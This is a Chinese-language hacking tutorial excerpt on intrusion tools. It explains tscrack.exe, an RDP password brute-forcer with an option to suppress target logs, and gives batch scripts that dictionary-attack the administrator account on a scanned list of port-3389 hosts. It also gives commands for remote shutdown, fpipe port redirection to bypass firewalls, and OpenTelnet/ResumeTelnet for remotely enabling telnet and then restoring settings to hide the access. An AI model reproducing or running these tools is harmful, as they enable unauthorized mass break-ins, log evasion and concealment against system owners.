終端服務密碼破解: tscrack.exe參數說明 -h 顯示使用幫助 -v 顯示版本信息 -s 在屏幕上打出解密能力 -b 密碼錯誤時發出的聲音 -t 同是發出多個連接(多線程) -N Prevent System Log entries on targeted server -U 卸載移除tscrack組件 -f 使用-f後面的密碼 -F 間隔時間(頻率) -l 使用-l後面的用戶名 -w 使用-w後面的密碼字典 -p 使用-p後面的密碼 -D 登錄主頁面 用法示例 tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破主機的administrator的登陸密碼 tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸192.168.0.1的administrator用戶 @if not exist ipcscan.txt goto noscan @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i nscan @echo 3389.txt no find or scan faild (①存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到壹批開有3389的主機IP列表文件3389.txt) 3389.bat意思是:從3389.txt文件中取壹個IP,接著運行hack.bat @if not exist tscrack.exe goto noscan @tscrack %1 -l administrator -w pass.dic >>rouji.txt :noscan @echo tscrack.exe no find or scan faild (②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同壹個目錄下;就可以等待結果了) hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼,並將破解結果保存在 rouji.txt文件中。
5、其它:Shutdown.exe Shutdown IP地址 t:20 20秒後將對方NT自動關閉(Windows 2003系統自帶工具,在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。) fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細說明(端口重定向繞過防火墻) fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨妳的80端口時,他掃到的結果會完全是www.sina.com.cn的主機信息 Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP發送的23端口Telnet請求經端口重定向後,就通過88端口發送到目標IP的23端口。(與目標IP建立Telnet時本機就用的 88端口與其相連接)然後:直接Telnet 127.0.0.1(本機IP)就連接到目標IP的23端口了。 OpenTelnet.exe (遠程開啟telnet工具) opentelnet.exe IP 帳號 密碼 ntlm認證方式 Telnet端口(不需要上傳ntlm.exe破壞微軟的身份驗證方式)直接遠程開啟對方的telnet服務後,就可用telnet ip 連接上對方。NTLM認證方式:0:不使用NTLM身份驗證;1:先嘗試NTLM身份驗證,如果失敗,再使用用戶名和密碼;2:只使用NTLM身份驗證。 ResumeTelnet.exe (OpenTelnet附帶的另壹個工具) resumetelnet.exe IP 帳號 密碼用Telnet連接完對方後,就用這個命令將對方的Telnet設置還原,並同時關閉Telnet服務。